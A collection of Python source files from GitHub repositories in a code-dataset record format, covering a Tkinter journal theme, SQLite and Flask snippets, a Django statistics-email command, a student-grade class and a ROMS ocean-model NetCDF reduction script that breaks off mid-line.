self.theme_settings('shadow', {\n 'TButton': {\n 'configure': {'padding': 3, 'foreground': 'white', 'relief': 'raised',\n 'font': 'TkDefaultFont', 'background': 'black', \n 'anchor': 'center', 'borderwidth': 4, 'width': 20},\n 'map': {'foreground': [('disabled', 'gray40'), ('pressed', 'white'), \n ('active', 'white')],\n 'background': [('disabled', 'black'), ('pressed', 'gray20'), \n ('active', 'gray10')],\n 'relief': [('pressed', 'groove'), ('!pressed', 'raised')]}},\n 'TLabel': {\n 'configure': {'background': 'black', 'foreground': 'white'}},\n 'TCombobox': {\n 'configure': {'fieldbackground': 'gray10', 'arrowcolor': 'gray50',\n 'background': 'black'},\n 'map': {'focusfill': [('readonly', 'focus', 'SystemHighlight')], \n 'foreground': [('disabled', 'SystemGrayText'), \n ('readonly', 'focus', 'black')], \n 'selectforeground': [('readonly', 'white')], \n 'selectbackground': [('readonly', 'gray10')]}},\n 'TCheckbutton': {\n 'configure': {'foreground': 'white', 'background': 'black', \n 'font': ('TkDefaultFont','10'), 'indicatorcolor': 'black'},\n 'map': {'indicatorcolor': [('pressed', 'white'), ('selected', 'blue')]}},\n 'TRadiobutton': {\n 'configure': {'foreground': 'white', 'background': 'black', \n 'indicatorcolor': 'black', 'padding': 3},\n 'map': {'indicatorcolor': [('pressed', 'white'), ('selected', 'blue')]}},\n 'Vertical.TScrollbar': {\n 'configure': {'background': 'black', 'troughcolor': 'gray30', 'arrowcolor': 'white'}},\n 'Horizontal.TScrollbar': {\n 'configure': {'background': 'black', 'troughcolor': 'gray30', 'arrowcolor': 'white'}},\n 'UI.TButton': {\n 'configure': {}},\n 'Current.UI.TButton': {\n 'configure': {'background': 'black', 'foreground': 'DeepSkyBlue2'},\n 'map': {'foreground': [('active', 'DeepSkyBlue2')]}},\n 'Bold.UI.TButton': {\n 'configure': {'font': ('TkDefault', '9', 'bold')}},\n 'Tags.Bold.UI.TButton': {\n 'configure':{'font': ('TkDefault', '9', 'bold', 'underline')}},\n 'Tags.Variable.UI.TButton': {\n 'configure': ''},\n 'TFrame': {\n 'configure': {'background': 'black'}},\n 'TMenubutton': {\n 'configure': {'background': 'black', 'foreground': 'white',\n 'indicator': 'red'}}\n })\n \n self.theme_create('daylight', 'shadow')\n self.theme_settings('daylight', {\n 'TButton': {\n 'configure': {'padding': 3, 'foreground': 'black', 'relief': 'raised',\n 'font': 'TkDefaultFont', 'background': 'white', \n 'anchor': 'center', 'borderwidth': 4, 'width': 20},\n 'map': {'foreground': [('disabled', 'gray40'), ('pressed', 'black'), \n ('active', 'black')],\n 'background': [('disabled', 'light grey'), ('pressed', 'white smoke'), \n ('active', 'azure')],\n 'relief': [('pressed', 'groove'), ('!pressed', 'raised')]}},\n 'TLabel': {\n 'configure': {'background': 'white', 'foreground': 'black'}},\n 'TCombobox': {\n 'configure': {'fieldbackground': 'gray70', 'arrowcolor': 'gray50',\n 'background': 'gray'},\n 'map': {'focusfill': [('readonly', 'focus', 'SystemHighlight')], \n 'foreground': [('disabled', 'SystemGrayText'), \n ('readonly', 'focus', 'black')], \n 'selectforeground': [('readonly', 'black')], \n 'selectbackground': [('readonly', 'gray70')]}},\n 'TCheckbutton': {\n 'configure': {'foreground': 'black', 'background': 'white', \n 'font': ('TkDefaultFont','10'), 'indicatorcolor': 'black'},\n 'map': {'indicatorcolor': [('pressed', 'gray'), ('selected', 'blue')]}},\n 'TRadiobutton': {\n 'configure': {'foreground': 'black', 'background': 'white', \n 'indicatorcolor': 'black', 'padding': 3},\n 'map': {'indicatorcolor': [('pressed', 'gray'), ('selected', 'blue')]}},\n 'Vertical.TScrollbar': {\n 'configure': {'background': 'white', 'troughcolor': 'gray70', 'arrowcolor': 'gray50'}},\n 'Horizontal.TScrollbar': {\n 'configure': {'background': 'white', 'troughcolor': 'gray70', 'arrowcolor': 'gray50'}},\n 'UI.TButton': {\n 'configure': {}},\n 'Current.UI.TButton': {\n 'configure': {'background': 'white', 'foreground': 'blue'},\n 'map': {'foreground': [('active', 'blue')]}},\n 'Bold.UI.TButton': {\n 'configure': {'font': ('TkDefault', '9', 'bold')}},\n 'Tags.Bold.UI.TButton': {\n 'configure':{'font': ('TkDefault', '9', 'bold', 'underline')}},\n 'Tags.Variable.UI.TButton': {\n 'configure': ''},\n 'TFrame': {\n 'configure': {'background': 'white'}},\n 'TMenubutton': {\n 'configure': {'background': 'white', 'foreground': 'black',\n 'indicator': 'red'}}\n })\n \n def setDayStyle(self):\n self.theme_use('daylight')\n textcolors = {'1': 'black', '2': 'black', '3': 'blue'}\n bgcolors = {'1': 'gray70', '2': 'gray90'}\n self.setTkBGColors(bgcolors)\n self.setTkTextColors(textcolors)\n \n def setNightStyle(self):\n self.theme_use('shadow')\n textcolors = {'1': 'white', '2': 'lime green', '3': 'DeepSkyBlue2'}\n bgcolors = {'1': 'black', '2': 'gray8'}\n self.setTkBGColors(bgcolors)\n self.setTkTextColors(textcolors)\n \n def setTkBGColors(self, kw):\n self.bgcolor1 = kw['1']\n self.bgcolor2 = kw['2']\n \n def setTkTextColors(self, kw):\n self.text_color1 = kw['1']\n self.text_color2 = kw['2']\n self.text_color3 = kw['3']\n \n def getCustomValues(self):\n return {'relief': self.frame_relief, 'border': self.frame_borderwidth, \n 'bgcolor1': self.bgcolor1, 'bgcolor2': self.bgcolor2, \n 'textcolor1': self.text_color1, 'textcolor2': self.text_color2, \n 'textcolor3': self.text_color3, 'padx': self.padx, \n 'pady': self.pady, 'arrow': self.text_color1}\n \n def toggleTheme(self):\n if self.theme_use() is 'daylight':\n self.setNightStyle()\n else:\n self.setDayStyle()\n \n def addWidget(self, wid):\n self.tk_widgets.append(wid)\n \n \napp=Main()\napp.mainloop()","repo_name":"kozmik-moore/kunnekted-jurnl","sub_path":"Journal.py","file_name":"Journal.py","file_ext":"py","file_size_in_byte":24276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11181438201","text":"import sqlite3\nimport simplejson as json\nimport datetime\n\n#DB 생성\n#for desktop\nconn = sqlite3.connect('C:/python_Webcroling/section5/databases/sqlite_homework.db') #isolation_level=None : Auto Commit\n#날짜 생성\nnow = datetime.datetime.now()\nnowDatetime = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nc = conn.cursor()\nc.execute('CREATE TABLE IF NOT EXISTS photos(albumId INTEGER, id text, title text, url text, thumbnailUrl text, regdate text)')\n\nwith open('C:/python_Webcroling/section5/data/photos.json', 'r') as infile:\n r = json.load(infile)\n photoDate = []\n for photo in r:\n t =(photo['albumId'],photo['id'],photo['title'],photo['url'],photo['thumbnailUrl'],nowDatetime)\n print(t)\n photoDate.append(t)\n c.executemany(\"INSERT INTO photos(albumId, id, title, url, thumbnailUrl, regdate) VALUES (?,?,?,?,?,?)\", tuple(photoDate))\n\nconn.commit()\n","repo_name":"wnstlddl/-webcrolling_section5","sub_path":"5-homework2.py","file_name":"5-homework2.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21877596425","text":"import json\nimport os\nimport textwrap\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom django.conf import settings\nfrom django.contrib.humanize.templatetags.humanize import intword\nfrom django.core.mail import send_mail\nfrom django.core.management.base import BaseCommand\nfrom django.db.models.aggregates import Sum\nfrom django.utils import timezone\n\nfrom users.models import User\n\nfrom ...models import Win, CustomerResponse\n\n\nclass Command(BaseCommand):\n \"\"\" Emails stats of Wins and Users to date (optional JSON) \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--json\",\n action=\"store_true\",\n help=\"Output the statistics in JSON format.\"\n )\n parser.add_argument(\n \"--show-all\",\n action=\"store_true\",\n help=\"Don't exclude staff users.\"\n )\n\n def handle(self, *args, **options):\n\n wins = Win.objects.all()\n confirmations = CustomerResponse.objects.all()\n users = User.objects.all()\n one_week_ago = timezone.now() - relativedelta(weeks=1)\n\n stats = {\n \"wins\": {\n \"total\": wins.count(),\n \"total-export-funds\": wins.aggregate(\n total=Sum(\"total_expected_export_value\"))[\"total\"],\n \"total-non-export-funds\": wins.aggregate(\n total=Sum(\"total_expected_non_export_value\"))[\"total\"],\n \"confirmed\": confirmations.count(),\n \"total-confirmed-export-funds\": wins.filter(confirmation__isnull=False).aggregate(\n total=Sum(\"total_expected_export_value\"))[\"total\"],\n \"total-confirmed-non-export-funds\": wins.filter(confirmation__isnull=False).aggregate(\n total=Sum(\"total_expected_non_export_value\"))[\"total\"],\n\n },\n \"users\": {\n \"total-active\": users.filter(\n last_login__gt=one_week_ago).count(),\n \"total-creating-wins\": users.exclude(\n wins__isnull=True).distinct().count(),\n \"total\": users.count(),\n }\n }\n\n if options[\"json\"]:\n return self._handle_json(stats)\n\n stats_txt = self._generate_txt(stats)\n send_to_addresses = os.getenv(\"STATS_EMAILS\").split(',')\n\n send_mail(\n \"Export Wins statistics\",\n stats_txt,\n settings.SENDING_ADDRESS,\n send_to_addresses,\n )\n\n\n def _generate_txt(self, stats):\n wins = stats[\"wins\"]\n users = stats[\"users\"]\n stats_txt = \"\"\"\n Export Wins input by officers:\n\n Total wins generated: {}\n Total expected export value: {}\n Total expected non-export value: {}\n\n\n -----\n\n\n Export wins customers have responded to:\n\n Total wins responded to: {}\n Total expected export value: {}\n Total expected non export value: {}\n\n\n -----\n\n\n Users (officers):\n\n Total logged in last week: {}\n Total who have submitted wins: {}\n Total who have been issued password: {}\n\n \"\"\".format(\n wins[\"total\"],\n \"£{}\".format(intword(wins[\"total-export-funds\"])),\n \"£{}\".format(intword(wins[\"total-non-export-funds\"])),\n wins[\"confirmed\"],\n \"£{}\".format(intword(wins[\"total-confirmed-export-funds\"])),\n \"£{}\".format(intword(wins[\"total-confirmed-non-export-funds\"])),\n users[\"total-active\"],\n users[\"total-creating-wins\"],\n users[\"total\"]\n )\n return textwrap.dedent(stats_txt)\n\n @staticmethod\n def _handle_json(stats):\n return json.dumps(stats, separators={\",\", \":\"})\n","repo_name":"adamchainz/export-wins-backend","sub_path":"wins/management/commands/win_statistics.py","file_name":"win_statistics.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27277378792","text":"from flask import Flask, render_template, request\nfrom werkzeug import secure_filename\nimport os\n\napp = Flask(__name__)\n\n@app.route('/end', methods = ['GET', 'POST'])\ndef end_again():\n if request.method == 'POST':\n option = request.form['correct']\n if os.path.isfile(\"./records/record.txt\"):\n f = open(\"./records/record.txt\", \"a\")\n else:\n f = open(\"./records/record.txt\", \"w\")\n if option == 'yes':\n f.write('1')\n f.close()\n return \"Thank you!\" + render_template('end.html')\n else:\n f.write('0')\n f.close()\n return \"Sorry...\" + render_template('end.html')\n\n\nif __name__ == '__main__':\n #서버 실행\n app.run(debug = True, host='0.0.0.0', port=5003)\n","repo_name":"YeRyeongLee/cat_or_dog","sub_path":"3_end/server3.py","file_name":"server3.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28830861754","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n# Fichier: mes_modules_path.py\r\n# Auteur: Marc COATANHAY\r\n\r\n\"\"\"\r\n Ajout du path nécessaire à l'importation de modules personnels.\r\n\"\"\"\r\n\r\n# Import des modules\r\nimport sys\r\n\r\n# Définitions constantes et variables globales\r\nrepertoire = 'C:\\\\Users\\\\MC\\\\Documents\\\\Python\\\\Mes_modules'\r\nsys.path.append(repertoire)\r\nprint('* Mes modules path :', repertoire, '/ok')","repo_name":"mcoatanhay/dornicalc","sub_path":"mes_modules_path.py","file_name":"mes_modules_path.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28944600448","text":"class Student:\r\n def __init__(self,id,name,mid1_marks,mid2_marks,quiz_marks):\r\n self.id=id\r\n self.name=name\r\n self.mid1_marks=mid1_marks\r\n self.mid2_marks=mid2_marks\r\n self.quiz_marks=quiz_marks\r\n def info(self):\r\n print(\"ID:\",self.id)\r\n print(\"name:\",self.name)\r\n print(\"mid1_marks:\", self.mid1_marks)\r\n print(\"mid2_marks:\", self.mid2_marks)\r\n print(\"quiz_marks:\", self.quiz_marks)\r\n def total(self):\r\n total=self.mid1_marks+self.mid2_marks+self.quiz_marks\r\n print(\"TOTAL:\",total)\r\n if(total>=80):\r\n print(\"A GRADE\")\r\n elif(total<80 and total>=60):\r\n print(\"B GRADE\")\r\n elif(total>=50 and total<60):\r\n print(\"C GRADE\")\r\nx=Student(11012,\"ARUN\",10,10,30)\r\nx.info()\r\nx.total()\r\n","repo_name":"PerlaVenkataArunKumar/Python-codes","sub_path":"Python/idle problems/65.py","file_name":"65.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15550361456","text":"\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 18 16:56:38 2023\n\n@author: thorbjornostenbymoe\n\"\"\"\n\"\"\"\nScript for reducing size of output file, can surely be solved in the supercomputer \nwith nc.dump, but this gives a lot of choices....\n\nInterpolation from u and v points to rho points should probably be done in the horizontal\nregion part of the script :)\n\"\"\"\n\n###############################################################################\n################################# - Packages - ################################\n###############################################################################\n\nimport numpy as np\nimport netCDF4 as nc\n\n###############################################################################\n############################### - User options - ##############################\n###############################################################################\n\"\"\" NB - nothing outside of user options should have to be changed unless a new variable is added\"\"\"\n\n# file path - split up to fit with writing of new file\nMain_path = '/Users/thorbjornostenbymoe/Desktop/Initialization_of_model/MODEL_SETUP/NEW_OUTPUT_HHH'\nExperiment = '/MOD/pNIIC_NIJ/'\nFilename = 'roms_avg_0004.nc.nosync'\n\nds = nc.Dataset(Main_path+Experiment+Filename)\n\n#original dimensions\nOrig_t = np.shape(ds['temp'])[0]\nOrig_z = np.shape(ds['temp'])[1]\nOrig_x = np.shape(ds['temp'])[2]\nOrig_y = np.shape(ds['temp'])[3]\n\n# Print dimensions along the way?\nPrintDim = 1\n\n#Variables to include (1 = include)\nincl_Temp = 1 # Temperature\nincl_Salt = 1 # Salinity\nincl_Uvel = 1 # Zonal velocity\nincl_Vvel = 1 # Meridional Velocity\nincl_Ubar = 1 # Depth-integrated zonal velocity\nincl_Vbar = 1 # Depth-integrated meridional velocity\nincl_Zeta = 1 # Sea surface height\nincl_Wvel = 1 # Vertical Velocity\nincl_Omeg = 1 # Vertical momentum\nincl_shfx = 1 # surface heat flux\nincl_ssfx = 1 # surface salt flux\nonly_time_3D = 0 # Only do horizontal averages for 4D variables, 3D variables are only treated in time \n# if new variables are desired, simply add here and below according to dimension of variable\n\n#recomended to always include\nincl_Cs_r = 1 # rho-coordinate stretching\nincl_Cs_w = 1 # W-coordinate stretching\nincl_dept = 1 # depth array\n\n# Time averages?\nTime_avg = 0 # 1 = time average\nTime_a_start = 6 # When does the time average start? (month) \nTime_a_end = 12 # When does the time average end? (month)\n\n# Specific period? \n# (If only one time-step is desired, simply set Time_p_start = Time_p_end)\nTime_per = 1 # 1 = specific period\nTime_p_start = 6 # When does the time period start? (month) \nTime_p_end = 12 # When does the time period end? (month)\ntime_p_dim = Time_p_end - Time_p_start #dimension of newly defined period\n\n\n# Horizontal average? \nHoriz_avg = 0 # 1 = Horizontal average\nHoriz_avg_d = 'x' # 'x' = zonal average, 'y' = meridional average\nHoriz_avg_s = 125 # Where does the horizontal average start?\nHoriz_avg_e = 175 # Where does the horizontal average end?\nHoriz_avg_dim = Horiz_avg_e - Horiz_avg_s\n\n# Horizontal region? (retains only a specified region)\nHoriz_reg = 1 # 1 = Horizontal average\nHoriz_reg_both = 1 # 1 = average over both dims\nHoriz_reg_dim = 'y' # 'x' = zonal average, 'y' = meridional average\n# 1 is for zonal \nHoriz_reg_s1 = 125 # Where does the horizontal region start?\nHoriz_reg_e1 = 175 # Where does the horizontal region end?\nHoriz_reg_dim1 = Horiz_reg_e1 - Horiz_reg_s1\n# 2 is for meridional \nHoriz_reg_s2 = 100 # Where does the horizontal region start?\nHoriz_reg_e2 = 200 # Where does the horizontal region end?\nHoriz_reg_dim2 = Horiz_reg_e2 - Horiz_reg_s2\n\n###############################################################################\n################################ - Functions - ################################\n###############################################################################\n\n#function to get desired data, should work for all dimensions and output (as long as the dimension is 3D or 4D)\ndef get_avgs_4D(VARIABLE,name,counter):\n orig_z = np.shape(VARIABLE)[1] #original dimensions\n orig_x = np.shape(VARIABLE)[2]\n orig_y = np.shape(VARIABLE)[3]\n \n ###################### - TIME - ######################\n if Time_avg == 1: # if user wants a time average, start and end is defined in 'User Options'\n VARIABLE = np.array([np.nanmean(VARIABLE[Time_a_start:Time_a_end,:,:,:],axis=0)]) # np.array to fit NetCDF file\n tdim = 1\n \n elif Time_per == 1: # if user wants a certain time period, start and end is defined in 'User Options'\n if Time_p_start == Time_p_end: # if start = end, only one timestep is retrieved\n VARIABLE = np.array([VARIABLE[Time_p_start,:,:,:]])\n tdim = 1\n \n else: # else a time period is chosen\n VARIABLE = VARIABLE[Time_p_start:Time_p_end,:,:,:]\n tdim = time_p_dim\n \n else: #get full data period\n VARIABLE = VARIABLE\n tdim = Orig_t\n \n ###################### - SPACE - ######################\n if Horiz_avg == 1: # retrieve horizontal transect averaged over chosen extent, zonal or meridional\n if Horiz_avg_d == 'x': # zonal average\n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,:,Horiz_avg_s:Horiz_avg_e,:],axis=2)]),newshape=[tdim,orig_z,1,orig_y]) # Reshape to fit NetCDF file\n elif Horiz_avg_d == 'y': # meridional average \n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,:,:,Horiz_avg_s:Horiz_avg_e],axis=3)]),newshape=[tdim,orig_z,orig_x,1]) # Reshape to fit NetCDF file\n\n elif Horiz_reg == 1: # retrieve only a chosen region of the domain, could be used to for instance exclude nudging regions\n if Horiz_reg_both == 1: # both zonal and meridional selected region\n VARIABLE = VARIABLE[:,:,Horiz_reg_s1:Horiz_reg_e1,Horiz_reg_s2:Horiz_reg_e2]\n else:\n if Horiz_reg_dim == 'x': # only zonal region\n VARIABLE = VARIABLE[:,:,Horiz_reg_s1:Horiz_reg_e1,:]\n if Horiz_reg_dim == 'y': # only meridional region\n VARIABLE = VARIABLE[:,:,:,Horiz_reg_s2:Horiz_reg_e2]\n \n if PrintDim == 1: #print dimension\n print(str(counter)+'. '+name+'(t,z,x,y): '+str(np.shape(VARIABLE)))\n counter = counter + 1\n return VARIABLE,counter\n\n# same as last function for 3D variables\ndef get_avgs_3D(VARIABLE,name,counter):\n orig_x = np.shape(VARIABLE)[1]\n orig_y = np.shape(VARIABLE)[2]\n if Time_avg == 1:\n VARIABLE = np.array([np.nanmean(VARIABLE[Time_a_start:Time_a_end,:,:],axis=0)])\n tdim = 1\n elif Time_per == 1:\n if Time_p_start == Time_p_end: \n VARIABLE = np.array([VARIABLE[Time_p_start,:,:]])\n tdim = 1\n else:\n VARIABLE = VARIABLE[Time_p_start:Time_p_end,:,:]\n tdim = time_p_dim\n else:\n VARIABLE = VARIABLE\n tdim = Orig_t\n\n #space\n if Horiz_avg == 1:\n if Horiz_avg_d == 'x':\n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,Horiz_avg_s:Horiz_avg_e,:],axis=1)]),newshape=[tdim,1,orig_y])\n elif Horiz_avg_d == 'y':\n VARIABLE = np.reshape(np.array([np.nanmean(VARIABLE[:,:,Horiz_avg_s:Horiz_avg_e],axis=2)]),newshape=[tdim,orig_x,1])\n\n elif Horiz_reg == 1:\n if Horiz_reg_both == 1:\n VARIABLE = VARIABLE[:,Horiz_reg_s1:Horiz_reg_e1,Horiz_reg_s2:Horiz_reg_e2]\n else:\n if Horiz_reg_dim == 'x':\n VARIABLE = VARIABLE[:,Horiz_reg_s1:Horiz_reg_e1,:]\n if Horiz_reg_dim == 'y':\n VARIABLE = VARIABLE[:,:,Horiz_reg_s2:Horiz_reg_e2]\n \n if PrintDim == 1:\n print(str(counter)+'. '+name+'(t,x,y): '+str(np.shape(VARIABLE)))\n counter = counter + 1\n return VARIABLE,counter\n\n\ndef get_avgs_3D_time(VARIABLE,name,counter): # same as previous but only for time\n if Time_avg == 1:\n VARIABLE = np.array([np.nanmean(VARIABLE[Time_a_start:Time_a_end,:,:],axis=0)])\n elif Time_per == 1:\n if Time_p_start == Time_p_end: \n VARIABLE = np.array([VARIABLE[Time_p_start,:,:]])\n else:\n VARIABLE = VARIABLE[Time_p_start:Time_p_end,:,:]\n else:\n VARIABLE = VARIABLE\n \n if PrintDim == 1:\n print(str(counter)+'. '+name+'(t,x,y): '+str(np.shape(VARIABLE)))\n counter = counter + 1\n return VARIABLE,counter\n\n\n###############################################################################\n################################### - file - ##################################\n###############################################################################\n\npath_string = Main_path+Experiment+'Reduced_'+Filename\nncid = nc.Dataset(path_string,mode='w',format='NETCDF4')\nncid.description = 'Reduced output of file: '+Main_path+Experiment+Filename\nncid.author = 'Thorbjoern Oestenby Moe'\n\n###############################################################################\n############################# - Set dimensions - ##############################\n###############################################################################\n\n# Original dimensions \n# Time\ntdim = Orig_t\n# Depth\nz1 = ds['Cs_r'][:].shape[0]\nz2 = ds['Cs_w'][:].shape[0]\n# Horizontal\nx1 = ds['v'][:].shape[2]\nx2 = ds['u'][:].shape[2]\ny1 = ds['u'][:].shape[3]\ny2 = ds['v'][:].shape[3]\n# Dim to use if a dimension is averaged over (to keep the shape constant)\ndim0 = 1\n\n# Setting dimensions of NetCDF file according to the desired data structure\n# This means keeping the original dimensions for variables or dimensions not changed\n# and reducing dimensions when neccessary\n\nif Time_avg == 1 or Time_p_start == Time_p_end:\n tdim = dim0\nelif Time_per == 1:\n tdim = time_p_dim\nelse:\n tdim = Orig_t\n\nif Horiz_avg == 1 and Horiz_avg_d == 'y':\n x1 = x1\n x2 = x2\n y1 = dim0\n y2 = dim0\n \nelif Horiz_avg == 1 and Horiz_avg_d == 'x':\n x1 = dim0\n x2 = dim0\n y1 = y1\n y2 = y2 \n\nelif Horiz_reg == 1 and Horiz_reg_both == 0 and Horiz_reg_dim == 'y':\n x1 = x1\n x2 = x2\n y1 = Horiz_reg_dim2\n y2 = Horiz_reg_dim2\n \nelif Horiz_reg == 1 and Horiz_reg_both == 0 and Horiz_reg_dim == 'x':\n x1 = Horiz_reg_dim1\n x2 = Horiz_reg_dim1\n y1 = y1\n y2 = y2\n\nelif Horiz_reg == 1 and Horiz_reg_both == 1:\n x1 = Horiz_reg_dim1\n x2 = Horiz_reg_dim1\n y1 = Horiz_reg_dim2\n y2 = Horiz_reg_dim2\n \n###############################################################################\n############################# - Make dimensions - #############################\n###############################################################################\n \ndt = ncid.createDimension('dt', tdim)\ndz1 = ncid.createDimension('dz1', z1)\ndz2 = ncid.createDimension('dz2', z2)\ndx1 = ncid.createDimension('dx1', x1)\ndx2 = ncid.createDimension('dx2', x2)\ndy1 = ncid.createDimension('dy1', y1)\ndy2 = ncid.createDimension('dy2', y2)\n\nhdx = ncid.createDimension('hdx', 268)\nhdy = ncid.createDimension('hdy', 402) \n\nif only_time_3D == 1:\n x3 = ds['v'][:].shape[2]\n x4 = ds['u'][:].shape[2]\n y3 = ds['u'][:].shape[3]\n y4 = ds['v'][:].shape[3]\n \n dx3 = ncid.createDimension('dx3', x3)\n dx4 = ncid.createDimension('dx4', x4)\n dy3 = ncid.createDimension('dy3', y3)\n dy4 = ncid.createDimension('dy4', y4)\n\n###############################################################################\n######### - Get data, average, define variable, and assign variable - #########\n###############################################################################\n\n#Template to add another variable:\n\"\"\"\n4D:\nif incl_NEW_VAR == 1:\n # Get data\n NEW_VAR_raw = ds['new_var'][:,:,:,:]\n # Make fields\n NEW_VAR,counter = get_avgs_4D(NEW_VAR_raw,'NEW_VAR short name',counter)\n \n # Create variable:\n #'dt': should be constant\n #'dz1': change to dz2 if variable is located on vertical w-point (e.g. W, omega,..) \n #'dx2': change to dx1 if variable is located on eta_vi-point\n #'dy2': change to dy1 if variable is located on xi_u-point \n \n new_var = ncid.createVariable('new_var','f8',('dt','dz1','dx2','dy2',))\n new_var.long_name = 'NEW_VAR long name'\n # Assign variable\n new_var[:,:,:,:] = NEW_VAR\n \n3D:\nif incl_NEW_VAR == 1:\n NEW_VAR_raw = ds['new_var'][:,:,:]\n \n if only_time_3D == 0:\n NEW_VAR,counter = get_avgs_3D(NEW_VAR_raw,NEW_VAR short name,counter) \n \n new_var = ncid.createVariable('new_var','f8',('dt','dx2','dy1',))\n new_var.long_name = 'NEW_VAR long name'\n new_var[:,:,:] = NEW_VAR\n \n elif only_time_3D == 1:\n NEW_VAR,counter = get_avgs_3D_time(NEW_VAR_raw,NEW_VAR short name,counter)\n \n new_var = ncid.createVariable('new_var','f8',('dt','dx4','dy3',))\n new_var.long_name = 'NEW_VAR long name'\n new_var[:,:,:] = NEW_VAR\n\"\"\"\n\nif PrintDim == 1:\n print('#####################################################################')\n print('################ - Variables included & dimension - #################')\n print('##################################################################### \\n')\ncounter = 1\nif incl_Temp == 1:\n # Get data\n TEMP_raw = ds['temp'][:,:,:,:]\n # Make fields\n TEMP,counter = get_avgs_4D(TEMP_raw,'T',counter)\n \n # Create variable\n temp = ncid.createVariable('temp','f8',('dt','dz1','dx2','dy2',))\n temp.long_name = 'Temperature'\n # Assign variable\n temp[:,:,:,:] = TEMP\n \nif incl_Salt == 1: #same comments for all others\n SALT_raw = ds['salt'][:,:,:,:]\n SALT,counter = get_avgs_4D(SALT_raw,'S',counter)\n \n salt = ncid.createVariable('salt','f8',('dt','dz1','dx2','dy2',))\n salt.long_name = 'Salinity'\n salt[:,:,:,:] = SALT\n \n \nif incl_Uvel == 1:\n UVEL_raw = ds['u'][:,:,:,:]\n UVEL,counter = get_avgs_4D(UVEL_raw,'u',counter)\n \n u = ncid.createVariable('u','f8',('dt','dz1','dx2','dy1',))\n u.long_name = 'Zonal Velocity'\n u[:,:,:,:] = UVEL\n\nif incl_Vvel == 1:\n VVEL_raw = ds['v'][:,:,:,:]\n VVEL,counter = get_avgs_4D(VVEL_raw,'v',counter)\n \n v = ncid.createVariable('v','f8',('dt','dz1','dx1','dy2',))\n v.long_name = 'Meridional Velocity'\n v[:,:,:,:] = VVEL\n \nif incl_Wvel == 1:\n WVEL_raw = ds['w'][:,:,:,:]\n WVEL,counter = get_avgs_4D(WVEL_raw,'w',counter)\n \n w = ncid.createVariable('w','f8',('dt','dz2','dx2','dy2',))\n w.long_name = 'Vertical Velocity'\n w[:,:,:,:] = WVEL\n \nif incl_Omeg == 1:\n OMEG_raw = ds['omega'][:,:,:,:]\n OMEG,counter = get_avgs_4D(OMEG_raw,'ω',counter)\n \n omega = ncid.createVariable('omega','f8',('dt','dz2','dx2','dy2',))\n omega.long_name = 'Vertical Momentum'\n omega[:,:,:,:] = OMEG\n\nif incl_Ubar == 1:\n UBAR_raw = ds['ubar'][:,:,:]\n \n if only_time_3D == 0:\n UBAR,counter = get_avgs_3D(UBAR_raw,u'u\\u0305',counter) \n \n ubar = ncid.createVariable('ubar','f8',('dt','dx2','dy1',))\n ubar.long_name = 'Depth-Integrated Zonal Velocity'\n ubar[:,:,:] = UBAR\n \n elif only_time_3D == 1:\n UBAR,counter = get_avgs_3D_time(UBAR_raw,u'u\\u0305',counter)\n \n ubar = ncid.createVariable('ubar','f8',('dt','dx4','dy3',))\n ubar.long_name = 'Depth-Integrated Zonal Velocity'\n ubar[:,:,:] = UBAR\n \nif incl_Vbar == 1:\n VBAR_raw = ds['vbar'][:,:,:]\n \n if only_time_3D == 0:\n VBAR,counter = get_avgs_3D(VBAR_raw,u'v\\u0305',counter) \n \n vbar = ncid.createVariable('vbar','f8',('dt','dx1','dy2',))\n vbar.long_name = 'Depth-Integrated Meridional Velocity'\n vbar[:,:,:] = VBAR\n \n elif only_time_3D == 1: \n VBAR,counter = get_avgs_3D_time(VBAR_raw,u'v\\u0305',counter) \n \n vbar = ncid.createVariable('vbar','f8',('dt','dx3','dy4',))\n vbar.long_name = 'Depth-Integrated Meridional Velocity'\n vbar[:,:,:] = VBAR\n \nif incl_Zeta == 1:\n ZETA_raw = ds['zeta'][:,:,:]\n \n if only_time_3D == 0:\n ZETA,counter = get_avgs_3D(ZETA_raw,'η',counter) \n \n zeta = ncid.createVariable('zeta','f8',('dt','dx2','dy2',))\n zeta.long_name = 'Sea Surface Elevation'\n zeta[:,:,:] = ZETA\n \n elif only_time_3D == 1: \n ZETA,counter = get_avgs_3D_time(ZETA_raw,'η',counter) \n \n zeta = ncid.createVariable('zeta','f8',('dt','dx4','dy4',))\n zeta.long_name = 'Sea Surface Elevation'\n zeta[:,:,:] = ZETA\n \nif incl_shfx == 1:\n SHFX_raw = ds['shflux'][:,:,:]\n \n if only_time_3D == 0:\n SHFX,counter = get_avgs_3D(SHFX_raw,'dQ',counter)\n \n shflux = ncid.createVariable('shflux','f8',('dt','dx2','dy2',))\n shflux.long_name = 'heat flux'\n shflux[:,:,:] = SHFX\n \n elif only_time_3D == 1:\n SHFX,counter = get_avgs_3D_time(SHFX_raw,'dQ',counter)\n \n shflux = ncid.createVariable('shflux','f8',('dt','dx4','dy4',))\n shflux.long_name = 'heat flux'\n shflux[:,:,:] = SHFX\n \nif incl_ssfx == 1:\n SSFX_raw = ds['ssflux'][:,:,:]\n if only_time_3D == 0:\n SSFX,counter = get_avgs_3D(SSFX_raw,'dS',counter) \n \n ssflux = ncid.createVariable('ssflux','f8',('dt','dx2','dy2',))\n ssflux.long_name = 'salt 